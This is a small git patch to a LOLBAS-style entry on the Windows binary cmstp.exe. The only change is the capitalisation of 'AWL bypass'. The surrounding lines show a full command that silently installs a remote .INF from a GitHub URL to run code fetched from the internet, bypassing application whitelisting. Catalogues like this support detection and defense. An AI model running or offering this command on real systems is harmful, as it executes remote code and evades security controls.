From 5e0ae9c976c4b290fa79b69e95e0646ea45e2029 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:46:13 -0400 Subject: [PATCH] Correcting Cmstp.yml Category value. --- yml/OSBinaries/Cmstp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 247a27c..f4dc7d4 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -14,7 +14,7 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AwL bypass + Category: AWL bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10